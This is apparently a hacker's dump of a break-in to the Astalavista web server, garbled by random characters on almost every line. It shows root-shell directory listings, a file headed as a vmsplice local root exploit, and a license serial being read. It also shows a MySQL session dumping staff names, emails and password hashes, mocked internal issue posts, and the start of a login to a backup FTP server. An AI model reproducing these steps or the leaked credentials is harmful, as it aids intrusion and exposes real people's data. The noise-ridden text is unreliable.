! f; z# N3 b7 q3 Y4 f$ ~$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
# h6 y# w( e% C) U% j5 ^- e- U+ g?>
. _0 b+ n e* N! B6 P5 H6 B( ^5 R+ v/ f1 C# C b& K$ \, f
sh-3.2# cd ..
! |+ B* h$ A$ f4 K% L/ Hsh-3.2# cd com
# W- r. m, ~0 ?8 osh-3.2# ls -la
8 O# A3 W" @# Y8 `$ k5 Ytotal 141208
( b q6 p. w C8 Z" Wdrwx–x–x 10 com com 4096 Apr 28 12:40 .2 V3 P& h$ f/ U6 q) L
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
/ `1 ^. `. x& W4 d+ e: U, u: T8 Tdrwx—— 2 com com 4096 Jun 4 04:04 backups6 {' G5 r: @- x4 `6 H
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
0 g H9 w, l6 Ddrwxr-xr-x 2 com com 4096 May 12 15:20 backup_system: U2 H9 M. y$ x6 A" ]5 Q2 [1 N0 s' @
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
( N2 g' ~/ t, G7 ~( D-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout
y. [/ T) l1 U- u9 H* q* O$ O( ^-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
' }4 U- @2 M+ Y# y1 ^, W+ p-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc' H4 k, _5 _2 M4 {
drwx–x–x 3 com com 4096 Jan 29 2008 domains2 F& @; ~/ ^# ] y8 `0 O5 N0 F' F
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed' `6 Q" N3 r* l
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap; S& ~: r& Y9 w2 O+ _: O
-rw——- 1 com com 69 Nov 18 2008 .lesshst
* F' J6 e5 F/ O2 o9 @/ U, n9 H% |3 wdrwx—— 2 com com 4096 Sep 24 2007 mail
) f0 H* F( L( v: E-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history. e1 ~* V4 P! H! j
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp1 q- n6 ^) y4 F, f$ S! J: B
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html5 Y% M2 a# r0 m! [8 I
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow/ T3 r, n3 Y* g4 L" K9 e) q
drwx—— 2 com com 4096 Aug 26 2008 .ssh
" n7 J3 Q2 V0 J; e-rwx—— 1 com com 8515 Feb 10 2008 t2 J1 j3 `$ a0 b$ [2 X$ Y- p
-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c6 Y* O+ L+ ]9 S% X2 q
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
/ B' s I6 J- T$ S ^-rw-rw-r– 1 com com 617 May 20 2008 .toprc0 V- z7 S* i7 c7 B$ V5 @
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
) }- H2 a7 L- Z0 p" H; R" M-rw——- 1 com com 16629 Mar 28 21:46 .viminfo' X4 [4 Z/ @8 u) G" Q! v$ `
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
( v4 U8 u0 b7 V- k1 J8 O. a: k7 m4 C$ m' b; S
sh-3.2# head t.c
2 i) g1 P4 y% K! ^/*4 ~$ A- a) O3 h9 q! Z) }( \
* jessica_biel_naked_in_my_bed.c
9 s2 F$ D; E+ L6 y*6 F& _2 F- M7 }, s3 P3 \
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.) |/ a3 b7 W: |4 M& [
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
# |6 [1 [9 L$ Z6 `6 s# U* Stejnak je to stare jak cyp a aj jakesyk rozbite.8 w6 d/ {+ w! |7 H* ^3 I
*" N9 ?% u' U. Q7 p% X. Z+ o. d
* Linux vmsplice Local Root Exploit
+ Z) p; G3 A/ U; J2 K) j3 n5 P! q* By qaaz
0 I) a) a# Z- Q( [# B) P( ^3 c. C*
7 l. {& W8 h6 a. L4 F* N8 s
n' i3 i7 y! O% Nsh-3.2# cd /; U ~2 b; o: r
sh-3.2# ls -la
8 n! A* R, @- G1 f" Itotal 3604 y- i6 v+ M6 k2 q' V5 ]
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .% E/ j @( m3 t. l; V
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
/ p9 h! V$ s; m) R F' Q-rw——- 1 root root 10240 Jun 3 02:39 aquota.group% A! I0 R. g4 J1 q5 R
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user
" W; O) E: X! y U. v; N-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db
S& T6 N" f$ ~8 a) H$ _-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck _, ~% t$ `/ R$ h
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel9 Y' A$ a! R" K( [1 e; Z, X
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup
+ J t* ~* s7 ?6 Z" Z) ]: Sdrwxr-xr-x 2 root root 4096 Jun 4 04:03 bin, n4 ?& _6 P$ g& g# O
drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
% g) k* D, F: G( T/ kdrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev1 `4 n% h0 h* z0 b
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
7 R, u5 r5 @1 t7 p' X' e0 b' Z" @drwxr-xr-x 14 root root 4096 Mar 11 17:56 home5 t7 Z' s, \% |: r
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf
2 R5 G6 f0 O+ }; A/ ^& e$ v" T4 V# ydrwxr-xr-x 11 root root 4096 Jun 4 04:02 lib# r: u& x, L, r) o" \) P7 k
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64( V3 H9 q0 v& U% ]2 ^
drwx—— 2 root root 16384 Sep 11 2007 lost+found8 t; [1 ? Y6 B4 C& f" ~
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media
% I! q2 Z X9 hdrwxr-xr-x 2 root root 0 Jun 3 02:43 misc
# P( V b) b( @, n: _drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
: O, v: @. T4 x" ]4 Z2 S4 i-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
( \3 _6 A4 `1 {( B$ {3 K0 ydrwxr-xr-x 2 root root 0 Jun 3 02:43 net8 ?3 r% Q/ P9 d7 {9 N+ O
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt9 E2 t( Z5 o, f" D) e2 d3 B8 L
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc9 I' K# f" @' G$ F( _, C
drwxr-x— 15 root root 4096 Jun 4 08:40 root- t9 b. I* P: w
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
1 ~ J( j/ T5 U i6 y tdrwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux, z: w6 z. Y5 W% J
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
* ^# h, F F6 _drwxr-xr-x 11 root root 0 Jun 3 02:42 sys
* e* o# q- t9 }1 V t" d8 W( y- g# mdrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
8 j* z! m! P) h. xdrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
2 j" T; A. ~; A3 j$ a3 Wdrwxr-xr-x 26 root root 4096 Jun 4 03:16 var
, m% x6 w _- [3 I$ p3 h
1 M# \# O) T% X9 k0 t! B4 wsh-3.2# cd opt/ i* i. D1 R) }! `% p/ e
sh-3.2# ls -la' r" v) j u% w
total 20
8 h6 h4 s' T- c( M' sdrwxr-xr-x 3 root root 4096 Mar 11 17:56 .
P0 b" t6 H/ ~& ~% w0 c2 |& Odrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..# j: v& d$ h" t5 B- F: c
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
" E* a: g- L2 H4 y
4 o9 f3 y( k- ^6 m1 a9 M1 Gsh-3.2# cd lsws/7 h" a2 H7 z* r. z& M
sh-3.2# ls -la
# h8 Z( y2 h2 C& D* G$ H1 [total 108
2 `( N. g4 V. S- Adrwxr-xr-x 15 root root 4096 Mar 20 2008 .
: x/ l$ ? w, J8 u& Mdrwxr-xr-x 3 root root 4096 Mar 11 17:56 ..; n$ r) Y2 B: A6 v: x/ U
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
! k+ t1 [* Y- M4 N& ?' bdrwxr-xr-x 13 root root 4096 May 29 15:10 admin. i! M# E% u' v# E+ ]
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
' Y0 R: g$ A8 P5 udrwxr-xr-x 2 root root 4096 May 29 15:10 bin
0 N$ ^; C' z/ a/ I: h9 }drwx—— 4 apache apache 4096 Jun 3 02:43 conf
1 A& Y/ H! U. _drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT& a" Z+ J, M6 j& ~
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
O5 s9 @4 f5 _drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
2 E% Q/ Y. u! ]0 ]) t8 ?1 A, R" [drwxr-xr-x 2 root root 4096 Sep 15 2008 lib0 {0 R$ ]2 r2 `9 v) u$ X
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
. k# {8 p% s/ ?2 P/ C% O-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP+ a- p8 `% R* Y
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
, \7 A( l2 h& o9 Z1 }1 G9 t-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP# K; k! \+ `; c7 A4 U, V
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
' I3 K: t, u/ L. Z- [drwxr-xr-x 2 root root 4096 Mar 20 2008 php
5 j1 |0 [* L( [/ x6 Idrwx—— 2 apache apache 4096 Mar 20 2008 phpbuild& Z( k' X* S# O! z9 c2 j6 g
drwxr-xr-x 3 root root 4096 Mar 20 2008 share
9 ^$ Y# q$ w2 J-rw-r–r– 1 root root 6 May 29 15:10 VERSION
" V' l- n. Q" e/ Z& u
* X+ N8 M V; X+ q8 p3 T# V4 fsh-3.2# cd conf
, c* B7 A. Q$ H5 G: Jsh-3.2# ls -la/ l- O+ P! j3 G2 Y5 U% T) I" I
total 48
& Y0 p+ d; v3 wdrwx—— 4 apache apache 4096 Jun 3 02:43 .1 p0 Q4 Y# i: F H1 q1 d% g
drwxr-xr-x 15 root root 4096 Mar 20 2008 ..
& j- S, _; K6 I) W7 [; Sdrwx—— 2 apache apache 4096 Mar 20 2008 cert
/ i" @9 ~- o8 P/ N, I9 Q-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
" R3 W7 ?5 ?% ^. V* H-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak0 I3 b8 u) J C! C9 r: O3 \
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last1 X& C5 e* b2 d( P( F8 V+ u
-rw——- 1 apache apache 256 May 29 15:10 license.key% N0 r( S# h: h- s% n
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old' w% z1 C' L* m, J! K
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
- C: K- x6 ^% F% B-rw——- 1 apache apache 20 May 29 15:10 serial.no7 f: @; Q2 U7 ]5 E5 A5 U% p7 M
drwx—— 2 apache apache 4096 Mar 20 2008 templates
! j+ Y, L; |# n5 A! |) S
# G, |8 P# B" h! i( w) P7 ^! {; jsh-3.2# cat serial.no8 n3 m r* R( g
IbDl-oVsO-CKqL-wVRa5 z2 f8 O7 T+ |. r: W# q
- w( [% E) g5 ?2 g I
sh-3.2# mysql5 P* `7 X9 b5 e+ ^
Welcome to the MySQL monitor. Commands end with ; or \g.9 x: [- o5 X/ t, C1 a4 Y8 D
Your MySQL connection id is 286844% ~. [8 Y4 l& r" X- g
Server version: 5.0.45-community-log MySQL Community Edition (GPL)1 t6 g+ ]0 i: x: t8 g, r
# I) S5 I% W' U2 ~" {, Q3 ZType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
; E" s3 F7 U. _
% s0 H: _1 X( u3 c5 _4 I" {" Mmysql> show databases;
" a, S. H( P" L8 t% j& G+———————–+
5 W2 z. V2 }) d7 T b }| Database |
3 T9 G5 T+ ?5 E1 O7 g+———————–+' P: ~5 Z8 t0 W; S) \" L
| information_schema |
4 G X: \, i6 ~" ]" l/ P| astanet_ads |
: u ]" T" n5 K! E+ w| astanet_mailing_lists |1 J" l: I' C# G. J
| astanet_mediawiki |
2 a3 [4 s9 b7 M6 E| astanet_membersystem |* Y! N! b `) j
| com_contrexx |
& z2 g$ _7 k- H6 Y$ ^1 s8 K9 ^* g+ r| com_contrexx2 |. D j8 o; M x/ f
| com_contrexx2_live |
* s; o' [ V5 |- R4 u; s' \| da_roundcube |
. n' w- r- i4 W- b, j- d* K1 || dolphin | x3 `9 J- A- b- E5 a# j
| ideapool |) e+ Y& d, K4 M! C. ~2 e
| mysql |
5 u, P4 y6 P7 m( z| test |
- G" |* [. Y- n| yourmaster |8 D( p2 a4 ^% |* t0 C5 h8 z4 T
+———————–+* N0 [7 F4 F: Y2 r" Q; U( K
14 rows in set (0.00 sec) H/ u- B' j! F/ k) C
; P& d5 w/ ]$ O& k ]* S! z; f
mysql> use ideapool
; T; U9 F" v0 q' S0 i) ?Database changed* r* R" ]* F, M0 i$ M
mysql> show tables;+ P8 f u4 w" ^2 Y- R
+———————————–+
5 M3 T9 K! W1 j& e) p| Tables_in_ideapool |; t" e$ q" h2 k& l% L6 X
+———————————–+9 d* _4 `# z: ]- E
| eventum_columns_to_display |$ q; l( z7 i$ ~# n4 h
| eventum_custom_field |/ p) K* g# j3 B0 Z& t2 B% X g" C! T
| eventum_custom_field_option |
5 r0 P( m6 B! b+ ~0 F! {, `| eventum_custom_filter |/ a6 V: C% \$ E0 a0 e
| eventum_customer_account_manager |
8 G$ J& U/ w/ s; D _| eventum_customer_note |2 N: P6 C3 o- N$ ~# x
| eventum_email_account |6 [9 M/ u0 y: d& ?# G) O# T; [. X0 ?" i
| eventum_email_draft |$ b4 D, v( m4 [! r0 N7 G
| eventum_email_draft_recipient |
/ O# V5 l0 J8 O3 S) i( h6 G| eventum_email_response |
( }8 Y. l. P: H8 `| eventum_faq |
4 J" l# c) U% `3 q% y8 Q' Z3 A| eventum_faq_support_level |
8 c3 }& s; F6 A T7 [# i/ p" t- p| eventum_group |
T3 K5 q0 ?7 t3 c' ]" i/ g7 [| eventum_history_type |& L* Z) `0 L# w% d
| eventum_irc_notice |: ~$ x7 U2 h: I$ |- e6 Q1 I
| eventum_issue |
4 H, w9 Y! F, k4 M2 d" `| eventum_issue_association |
' D4 U/ m/ b: Y2 }( A; Z8 M% c| eventum_issue_attachment |3 s' c" y+ `: t6 I2 D+ ^. `% I& C3 [8 T
| eventum_issue_attachment_file |4 K0 {$ t; Y9 n8 Z/ ~8 \5 M
| eventum_issue_checkin |
6 ?: L6 j" Q/ n- o+ O| eventum_issue_custom_field |
2 N5 C7 y7 o2 }; ?; y| eventum_issue_history | H2 M9 p2 i7 V- ]7 Z
| eventum_issue_quarantine |3 J1 e8 |) n* O5 X, o; x: q
| eventum_issue_requirement |5 o( N" y v5 U
| eventum_issue_user |
1 C; M+ a2 r* c: g. k# M# V/ ~| eventum_issue_user_replier |. }+ n: F% f$ z- q& i3 P8 o
| eventum_link_filter |1 M" B% g7 ?, z8 b5 a2 t& L
| eventum_mail_queue |- u% A) T) @! r L2 w$ d
| eventum_mail_queue_log |
5 H* {% [1 y( E+ d: M; z$ d| eventum_news |
, w1 u0 `* f8 @5 J| eventum_note |; R* Y) N2 g& a3 F, j/ q/ [
| eventum_phone_support |/ q2 `) H8 [; n) h, [
| eventum_project |: \7 A" _8 P) K* H$ n, h0 |+ P
| eventum_project_category |
0 s; A a1 ?. [8 {| eventum_project_custom_field |' W4 ~0 I2 M, W6 z& e
| eventum_project_email_response |
& F1 G5 ^1 g) {' d| eventum_project_field_display |
- o- F- Y) o3 {3 b' A0 A| eventum_project_group |
$ E' i8 S5 H% ~9 ~4 P6 y$ H F; x| eventum_project_link_filter |3 \. X. [ A; r3 s
| eventum_project_news |6 ?! T( C' |5 u
| eventum_project_phone_category |: r& ^, X j3 H' O. u# @
| eventum_project_priority |
7 `7 C4 S# J, ? L| eventum_project_release |
3 E, z7 s$ ^: T2 u| eventum_project_round_robin |
3 R5 h* \. K! O: b| eventum_project_status |
7 w6 W9 O1 M6 y/ J/ v6 d| eventum_project_status_date |
/ ~/ ^/ P; F _- h6 Z Y4 E* Z| eventum_project_user |
! ^' k8 _ c) W| eventum_reminder_action |8 f4 ^3 q8 y$ E+ n
| eventum_reminder_action_list |
+ Z/ y2 X4 u5 {8 x. M9 @% I| eventum_reminder_action_type |3 m( b% n: R. q% h7 y
| eventum_reminder_field |/ t' P9 o3 R$ ~) T8 }' s8 o
| eventum_reminder_history |
: p! @( b! |2 _7 v( W* x @| eventum_reminder_level |
2 x6 l* z4 }" n; N7 Y% E| eventum_reminder_level_condition |
$ E$ D* B3 v6 X8 M- `' ]4 J| eventum_reminder_operator |" s7 |# @* |. z5 E. V' x1 g9 r! j
| eventum_reminder_priority |# \& X' J" K8 ?! h P) k, |
| eventum_reminder_requirement |5 `8 O) i, [: \# ^1 c3 V! Y
| eventum_reminder_triggered_action |
3 H/ }- e5 Z* E| eventum_resolution |8 Y; C3 v3 l H: F/ P
| eventum_round_robin_user |
8 U9 o- e8 w' f| eventum_search_profile |
6 {( J; Y: B" p4 y) K7 F+ }| eventum_status |. ]; U; [$ ]3 H; t5 R% q5 c2 r
| eventum_subscription |
" H# a0 O) o) V K" v3 S: x| eventum_subscription_type |
4 b+ b. {" }' J8 w9 b| eventum_support_email |' z3 |) v* F/ `* n) {% f. ^$ s
| eventum_support_email_body | F$ n1 B1 R; h3 B6 Y8 ~
| eventum_time_tracking |, m3 Y# G. P4 j3 S! E N- d
| eventum_time_tracking_category |
$ ~8 ^0 P4 m T( f0 D$ E| eventum_user |) q2 L0 m9 [% E5 G. w
+———————————–+
% p5 t9 h/ e3 t% |9 m8 X69 rows in set (0.00 sec)
0 i' m$ \# \# P- ^3 l7 M) s; C. x1 U, n- {; A2 k8 W# h
mysql> describe eventum_user;
, F, c% _/ H% E/ @+————————-+——————+——+—–+———————+—————-+
# a. r6 t$ M4 R' w9 f% j3 Q| Field | Type | Null | Key | Default | Extra |
7 c3 {' E8 f7 m9 c+————————-+——————+——+—–+———————+—————-+; s. {) b% T, y; T6 |" M7 W# \
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |: m; j; w0 [( W; |1 k" S
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |/ }6 B7 o: `$ m5 A& R! a
| usr_customer_id | int(11) unsigned | YES | | NULL | |
0 X2 D ?9 T, N$ U6 d `9 c| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |& U [: D- k( @8 g% S
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
5 O" Y y8 i( p1 R& p| usr_status | varchar(8) | NO | | active | |
* d& z5 n6 T3 f) `| usr_password | varchar(32) | NO | | | |
. O% @6 g" v( X4 L. J) e. Y: u| usr_full_name | varchar(255) | NO | | | |
4 T- k/ `; { M9 d9 i& V. N| usr_email | varchar(255) | NO | UNI | | |" A" t7 y6 P" a
| usr_preferences | longtext | YES | | NULL | |( }, _6 E/ I2 x1 m3 d
| usr_sms_email | varchar(255) | YES | | NULL | |. N) z. G; v& z& R; s/ @' L
| usr_clocked_in | tinyint(1) | YES | | 0 | |
* ]8 `+ f* p$ N# p0 v| usr_lang | varchar(5) | YES | | NULL | |/ @3 n( K3 L) w/ C% P% j6 |* S- e
+————————-+——————+——+—–+———————+—————-+: x0 z" f' J8 H2 s' G' l! j
13 rows in set (0.00 sec)/ X$ s; O' u! u) m
8 B1 K+ @( K/ B7 z# a: {mysql> select usr_full_name,usr_email,usr_password from eventum_user;
8 Q* N7 `5 e1 _, J+ x- F7 ?) _+———————-+——————————-+———————————-+
( `+ R0 y2 N( x* g3 T v| usr_full_name | usr_email | usr_password |$ i$ W, K' m0 R: J4 q& m" E
+———————-+——————————-+———————————-+: f& b1 U( h! |1 }% m. z
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |/ [( L0 _' ]4 U. b
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |& O, J8 {$ ^- g& @8 z
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |! l, l: I! u! ]# _4 {
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
! E7 H$ |6 ~: A| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |. u0 @3 ]) K% T, c' x
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
) m& i: G& A( q9 g9 d| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
D7 {* H z; N. w+ h| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
. `- N" a! w4 j1 V3 b5 t| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
3 Y# H W2 _ `" Q7 e$ W' p" k| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |2 G7 q. K s1 Q( j5 B
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |1 t1 i# P. X D/ i7 \
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |
, J' c2 ?1 X1 e3 h' z9 {' g2 N! \| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
5 A/ [8 w D; n| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |
! T! \! d b9 |* j+ [& f( D7 {) j2 {| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
) W, R# P' R) y2 J/ ^+———————-+——————————-+———————————-+* q9 D( H$ X G8 j$ q, L0 H
15 rows in set (0.00 sec)# \5 ]4 g4 K% k* b
* ]# y2 D* ?4 A7 E) c, Amysql> select iss_description from eventum_issue where iss_id = 43;
3 M1 f. |4 u: X& P! C+ F2 h# `+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+' r/ K/ S1 w& t/ |
| iss_description
2 d3 ^" k. J9 h|
( ^8 @& h4 X9 T' B: V) Z9 ~4 b+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
. x; ?1 H1 t! f| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
, Y3 T: I4 ]4 [9 Z. I5 Nconnected for 90 mins… 120mins… so what i propose is something like:
) d, I6 a+ r. W( K( g链接标记[url]http://www.surfthechannel.com/[/url]; z/ l8 V' \, x6 z: l8 Z
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
' ^1 w2 b! O+ H, Ylike podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t& |2 S6 m" [. M1 v2 O
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off& o+ U9 s9 s- O; G
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…: h. l- m) G, v& X: }
0 D. T# v# t3 B/ y6 CWe could also put advertisement during play on the flash video player itself… extra $$…
9 D2 [/ ~6 P4 a; [7 L$ _2 h" W8 e$ x0 U+ G. ~/ `1 c% H ]/ v
By sykadul |( Y& M7 f$ w0 D; |0 h
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+" c+ q, f! F5 @, l0 V
1 row in set (0.00 sec)5 j u8 y( Z9 O! {) H8 e
, Q* k( n$ c( K: v
// Money and extra $$ is all they care about. remember that.
$ d5 P# e. v: G+ y' S0 u5 M* |6 n Q. V. ?- t- o$ I8 P
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
) _8 H$ \- O2 Z$ Q) A t$ n+————————+——————————————————————————————————————————————————————————————————————————————-+2 X3 n% F: m/ v- |) R. |& [
| iss_summary | iss_description
6 a; Q6 z: m% ]|
' D0 c. B: k; X+————————+——————————————————————————————————————————————————————————————————————————————-++ s7 E3 ~' R1 @/ X+ C& v1 |
| Forum for REAL EXPERTS | Hello,( q# t3 A* c8 a$ z# O; j
, V1 U% {% I' |* i: e
Ishtus and I,
" C+ }! ]1 f& K% \
3 i- }8 B7 t3 u+ B- p2 I( o9 ]Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide. s1 F. K3 {2 s3 k F7 x: U5 {
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc../ `% A/ ^1 o4 W3 _5 B2 y3 C$ q, J
# [& O0 t, C# S
One example a friend of mine from coresecurity.com!$ `+ V$ B' t$ A; j5 r6 g
. [$ F! G" D) j# \6 L& LWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
6 ^- u. q7 {. T( r. g
% d0 l* @3 K1 R, y6 R! V|; f0 v1 @, y8 G( i6 I: J0 d! e4 [
+————————+——————————————————————————————————————————————————————————————————————————————+. Y/ z' O4 y6 F; S2 Y
1 row in set (0.00 sec)
; W6 d# P9 p9 ^5 t4 v1 N
" I. } A5 e0 Q5 x, u; U" O// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…6 p, ]& u* B2 u2 m# ^* n! J- e
; Z0 M+ R. I' T8 Z0 r' T9 R! R" @mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
( i. V9 T6 l; |/ C+——————+———————————————————————————————+
; m7 S: u2 J3 R1 M| iss_summary | iss_description |
4 w* e1 [3 L1 D% g3 C3 X! J+——————+———————————————————————————————+& `9 b% p, `8 J
| Website guidance | Virtual Girl which guides you trought the website.
6 _. P9 i: ]( b5 F
* u8 x! o6 N9 x7 }We need a girl with who you can ( talk )!!!9 I3 a$ _; O8 r K" Q
Also for the News!
% L k* ?+ Y# ?* h0 S+ FSo my suggestion is a girl who read you the news loud if you like!/ G% U Y' n; D& w+ X- M! v
you can choose between read yourselfe or she read it for you or both!5 a/ N$ d% C9 Z$ v b
. K1 E8 R7 Q6 Q1 Q8 \" J: a
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!6 V6 `6 w4 M( A8 E; e7 H% f9 W& G
2 V1 _, m" L: K4 m+ l8 ^
Have a look on the example girls!!
8 C' S8 Z% M4 p. A2 }7 U! Q) }5 V5 Z+ B7 Z
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]9 L! G. W+ u! i5 Q) L
. U; T& [5 g# ~3 \or that& e- Q1 d- @% R2 U* C
9 E/ h6 i4 o2 Z! X+ {
链接标记[url]http://www.yellostrom.de/[/url]0 r( Z3 d; E, r1 a) |( H
) s; m: p; @# r& j) k& x|
x; l; Z, i5 m9 g( k- e, s+——————+———————————————————————————————+
+ u* Z- ?5 p' |! K1 p5 k* B* ]1 row in set (0.00 sec)
/ c& u5 D( O+ S9 e% ^( ^+ e+ v0 M/ L+ e- [4 t( I3 n
// ha ha.3 Q- ?7 V1 ^$ Y. Z! n& s* J
/ ^8 T- Y% O5 F- z& f' T
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
8 x V5 K7 ~) n! d+————————–+———————————————————————————————————–+
6 @. [9 \: G3 P! m5 j3 g+ K| iss_summary | iss_description |9 S1 J. n3 [; ? M
+————————–+———————————————————————————————————–+7 D0 I0 s* a# e5 k, t
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
" s; K, V& N2 {& E5 |% O8 i+————————–+———————————————————————————————————–+$ _# ~! E5 j3 W3 ?' L: P8 f! m/ U
1 row in set (0.00 sec)
/ X4 h$ O6 ?7 |! C7 W7 ^, b+ g5 d( w+ G; [
// LOL.
2 h9 L! f: m: `0 {9 ]( @! ~. c+ ]$ f0 N, s2 n% b# M2 T7 `3 i K
mysql> exit8 Y4 P c4 s: ~0 x
Bye# P+ @! d( Y# J
- f) A$ |3 o% h* i) M
sh-3.2# ftp 212.254.194.163
$ i4 [9 X( U. g; FConnected to 212.254.194.163.
/ x9 M6 {$ [8 u( ^220 BackupCOM_VW FTP server ready.
5 A' _, G; m, l- F504 AUTH: security mechanism ‘GSSAPI’ not supported.# V1 J9 O# h8 S. {9 b
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
% ^5 T+ E5 g7 kKERBEROS_V4 rejected as an authentication type* U' d) W( c' C8 S5 B1 Q6 N
Name (212.254.194.163:root): astalavista.com2 |: ]0 D8 Y3 @& [+ R
331 Password required for astalavista.com. \# L9 _" ]* t- v! A# }) E# x
Password:" d- o$ h8 }( F3 w! g- Z* _. A
230 User astalavista.com logged in.
, _) W- u3 N7 wRemote system type is UNIX.* L t% g7 w+ l
Using binary mode to transfer files.
X# g: U; a0 Z% Iftp> ls -la K$ X& b. v( z8 w) ~
227 Entering Passive Mode (212,254,194,163,2,188); Q5 n; ~% D/ V f% ~% |
150 Opening BINARY mode data connection for ‘file list’. e9 i" R( o Y2 ?
